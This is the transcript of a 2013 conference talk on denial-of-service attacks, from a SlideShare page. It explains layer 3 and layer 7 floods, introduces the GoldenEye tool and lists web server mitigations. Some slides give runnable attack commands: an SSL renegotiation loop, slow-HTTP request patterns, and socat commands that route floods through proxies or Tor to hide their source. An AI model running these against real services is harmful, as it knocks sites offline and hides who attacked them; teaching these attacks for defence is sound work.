Your SlideShare is downloading. ×
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Super Effective Denial of Service Attacks
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Super Effective Denial of Service Attacks

3,425

Published on

Talk given on October 16th at Latinoware 2013 - Foz do Iguaçu - Brazil …

Talk given on October 16th at Latinoware 2013 - Foz do Iguaçu - Brazil

This talk gave an introduction on denial of service attacks, going trough attacks in layer 3 to layer 7, introduced the concept of using load-balancing software for attacks with multiple IPs (Jericho Attack) and introduced the GoldenEye tool written in python and Android (Java), as well as a brief introduction to mitigate layer 7 denial-of-service attacks on most popular webservers.

Presentation Video (pt_BR) @ FISL 2014: https://www.youtube.com/watch?v=ozk0HiMjVNY

Published in: Technology, News & Politics
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,425
On Slideshare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
123
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • {}
  • Transcript

    • 1. super effective denial of service attacks Jan Seidl
    • 2. $ whoami Full Name: Jan Origin: Rio de Seidl Janeiro, RJ – Brazil Work: ● Technical Coordinator @ TI Safe ● ● OpenSource contributor for: PEV, Logstash ● ● Codes and snippets @ github.com/jseidl ● Features: ● UNIX Evangelist/Addict/Freak (but no fanboy!) ● ● Python and C lover ● ● Coffee dependent ● ● Hates printers and social networks ● ● Proud DC Labs Member ● Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 3. agenda 0x0 0x1 0x2 0x3 0x4 0x5 0x6 0x7 0x8 0x9 0xA Introduction to Denial-of-Service Background: Layer 3 attacks Attacking Layer 7: Fundamentals Attacking Layer 7: Vectors & Tools WebServer DoS Mitigation 101 Proxies (SOCKS/TOR) and Layer 7 attacks Jericho Attack Technique: Load-balancing attacks XSS D/DoS Size doesn't matter: Mobile-launched Denial-of-Service Demo/Video: GoldenEye MdoS Android Tool Questions? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 4. Introduction to Denial-of-Service What is denial of service? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 5. Introduction to Denial-of-Service What is denial of service? A denial-of-service attack (...), is an attempt to make a machine or network resource unavailable to its intended users. Source: Wikipedia/en_US Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 6. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 7. Introduction to Denial-of-Service Result? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 8. Introduction to Denial-of-Service Result? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 9. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 10. Introduction to Denial-of-Service Symptoms Oddly low performance Unavailability of given resource Unavailability of all resources Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 11. Introduction to Denial-of-Service Recent Cases Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 12. Introduction to Denial-of-Service http://money.cnn.com/2012/09/27/technology/bank-cyberattacks/index.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 13. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 14. Introduction to Denial-of-Service http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-victim-in-series-of-attacks/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 15. Introduction to Denial-of-Service http://nakedsecurity.sophos.com/2012/04/07/anonymous-attacks-home-office/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 16. Introduction to Denial-of-Service http://usatoday30.usatoday.com/tech/news/story/2012-07-19/hactivism-anonymous-attacks/56464792/1 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 17. Introduction to Denial-of-Service http://olhardigital.uol.com.br/negocios/digital_news/noticias/ataques-ddos-cresceram-70-em-2012,-dizpesquisa Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 18. Introduction to Denial-of-Service Targets (OSI layer) Network (Layer 3) Bandwidth consumption Application (Layer 7) Application or operating system resources consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 19. Introduction to Denial-of-Service Network (Layer 3) Bandwidth consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 20. Background: Layer 3 attacks Popular Attacks Ping Flood (…) is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP Echo Request (ping) packets (...) The attacker hopes that the victim will respond with ICMP Echo Reply packets, thus consuming both outgoing bandwidth as well as incoming bandwidth. Source: Wikipedia/en_US Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 21. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 22. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 23. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 24. Background: Layer 3 attacks Popular Attacks SYN Flood Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 25. Background: Layer 3 attacks Popular Attacks SYN Flood Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 26. Background: Layer 3 attacks Popular Attacks Teardrop Attack “When the sum of the offset and size of one fragmented packet differ from that of the next fragmented packet, the packets overlap, and the server attempting to reassemble the packet can crash, especially if it is running an older operating system that has this vulnerability.” http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 27. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 28. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 29. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 30. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 31. Attacking Layer 7: Fundamentals Application (Layer 7) Application or operating system resources consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 32. Attacking Layer 7: Fundamentals Focus Layer 3 Layer 7 Exhaust bandwidth Exhaust application or operating system keyresources Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 33. Attacking Layer 7: Fundamentals Stealthness Layer 3 Layer 7 High network noise (noisy attack) Low network noise, might emulate legit requests Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 34. Attacking Layer 7: Fundamentals Efficiency Layer 3 Layer 7 Requires lot of participants for significant outage. May be blocking by sparring Sometimes only one machine can cause damage. Difficult to block Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 35. Attacking Layer 7: Fundamentals Mitigation Layer 3 Layer 7 Large link, connectionlimiting, rate-limiting, sparring ? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 36. Attacking Layer 7: Fundamentals Layer 7 attacks targets Intense CPU, Disk I/O & Swapping operations, long/slow/complex queries Finite application resources: Maximum Sockets Limits, Maximum Memory Limits, Disk space etc Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 37. Attacking Layer 7: Vectors & Tools Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 38. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack 15% more processing power needed on server than on client to establish handshake. On the wild since 2003. Still affects most implementations. Found by THC group (ww.thc.org) in 2011 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 39. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack Tool: THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/> - or thc­ssl­dosit() { while :; do (while :; do echo R;  done) | openssl s_client ­connect 127.0.0.1:443  2>/dev/null; done } for x in `seq 1 100`; do thc­ssl­dosit & done Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 40. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack Affects any TLS/SSL secured protocol: HTTPS, SMTPS, POP3S, Database secure ports etc Mitigation? Turning off SSL renegotiation might help, but not solve SSL accelerators might help, but also don't 100% solve IPTables mitigation http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 41. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Parallel requests of small GZIP'ed content parts Forces the webserver to perform several parallel compression operations = high load Discovered in 2011 (CVE-2011-3192) Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 42. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Tools: killapache.pl < http://seclists.org/fulldisclosure/2011/Aug/175> Slowhttptest <http://code.google.com/p/slowhttptest/> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 43. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Mitigation: SetEnvIf or mod_rewrite (ref: http://httpd.apache.org/security/CVE-2011-3192.txt) Use a WAF (Web Application Firewall) Update Apache to version 2.2.21 or greater Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 44. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers, Slow Post, Slow Read Read or send data in small chunks, with interval between reads / writes. Waiting for the full request is part of the Web Server's nature Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 45. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers: send request headers 'Slowly' Slow Post: send request post body (post data) 'Slowly' Slow Read: Small TCP window size to force slow response reading Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 46. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers: send request headers 'Slowly' GET / HTTP/1.1 rn /* sleep(1) */ Connection: keep-alive rn /* sleep(1) */ ... Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 47. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Post: send request post body (post data) 'Slowly' Content-Type: application/x-www-form-urlencoded Content-Length: 512 Accept: text/html;q=0.9,text/plain;q=0.8 foo=bar /* sleep(1) */ bar=baz /* sleep(1) */ baz=foo /* sleep(1) */ ... Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 48. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Read: Small TCP window size to force slow response reading /* pseudocode */ int len = 1; while (data = read(sock, buffer, len)) { sleep(5); … } Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 49. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Tools: Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post Tool Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool Slow Read: slowhttptest Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 50. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks - Mitigation: Slow Headers: request timeout (apache's mod_reqtimeout), WAF Slow Post: request timeout, WAF Slow Read: Disable pipelining and oddly slow window sizes, limit maximum request request time, WAF Good article on slow attacks mitigation https://community.qualys.com/blogs/securitylabs/2011/11/02 /how-to-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 51. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache Keep connections open and force cache regeneration. First POC: HULK – HTTP Unbearable Load King Created on May 2012 by Barry Shteiman. <http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 52. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache: HULK Highly effective against IIS, Apache & Reverse Proxies Caveat: Python, Urllib2 → Always sends headers on the same order Spiderlabs: modsecurity rule to mitigate URLLib attacks (Hulk) (http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html) Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 53. Attacking Layer 7: Vectors & Tools Randomization FTW! Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 54. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache + Randomness: GoldenEye ● ● ● ● Author: Me! :) Initially born as a Hulk fork due to its fingerprinting weakness ● ● Transformed further into a new independent HTTP DoS Tool Born to test WAF blocking abilities under random and semi-natural payloads Available at https://github.com/jseidl/GoldenEye Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 55. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache + Randomness: GoldenEye Main Features: GET, POST or Random HTTP methods Random headers quantity Random Headers content with legit values as per RFC Better random block function to avoid fingerprinting Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Hackers to Hackers Conference 2012 – São Paulo, Brasil Hackers to Hackers Conference 2012 – São Paulo, Brasil
    • 56. Attacking Layer 7: Vectors & Tools Mitigation Granular page permissions Filter POST where not needed Filter querystring parameters where not needed ProxyCache Use caching proxies (ex: Varnish) and disable cache reload KeepAlive e TimeOuts Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and equivalent in other webservers Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Hackers to Hackers Conference 2012 – São Paulo, Brasil Hackers to Hackers Conference 2012 – São Paulo, Brasil
    • 57. WebServer DoS Mitigation 101 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 58. WebServer DoS Mitigation 101 Apache LimitRequestFields, LimitRequestFieldSize, LimitRequestBody, LimitRequestLine, LimitXMLRequestBody, TimeOut, KeepAliveTimeOut, ListenBackLog, MaxRequestWorkers [core] RequestReadTimeout [mod_reqtimeout] Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 59. WebServer DoS Mitigation 101 Nginx client_max_body_size, client_body_buffer_size, client_header_buffer_size, large_client_header_buffers, client_body_timeout, client_header_timeout [core] Modules: HttpLimitReqModule, HttpLimitZoneModule Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 60. WebServer DoS Mitigation 101 IIS 6 & 7 IIS 6: connectionTimeout, HeaderWaitTimeout, MaxConnections IIS 7: <RequestLimits> maxAllowedContentLength, maxQueryString, maxUrl <headerLimits> <Limits>/<WebLimits> connectionTimeout, headerWaitTimeout, minBytesPerSecond Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 61. WebServer DoS Mitigation 101 USE A WEB APPLICATION FIREWALL (WAF) Modsecurity (Apache / Nginx) http://www.modsecurity.org/ NAXSI (Nginx) http://code.google.com/p/naxsi/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 62. Proxies and Layer 7 attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 63. Proxies and Layer 7 attacks Layer 3 Layer 7 Bad to attack through proxies as they usually have low bandwidth and you might get banned from them Requires low bandwidth Low network noise Not degraded by low output Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 64. Proxies and Layer 7 attacks Why use proxies in HTTP attacks? Simple answer     Geographic location at your will     Different source IPs Can provide high anonymity Largely available on the internet Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 65. Proxies and Layer 7 attacks Attack pivoting by proxies Tool: Socat: Multipurpose Relay http://www.dest-unreach.org/socat/ Also with SSL support: HTTPS, IMAPS, POPS, LDAPS Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 66. Proxies and Layer 7 attacks Attack pivoting by proxies: Regular Proxies # socat TCP4­LISTEN:80  PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT> # echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts # ./goldeneye.py http://<VICTIM_HOST>/index.php ­t 1000  ­m get Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    • 67. Proxies and Layer 7 attacks Attack pivoting by proxies: TOR # socat TCP4­LISTEN:80,fork  SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052   # echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts # ./goldeneye.py http://<VICTIM_HOST>/index.php ­t 1000  ­m get Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
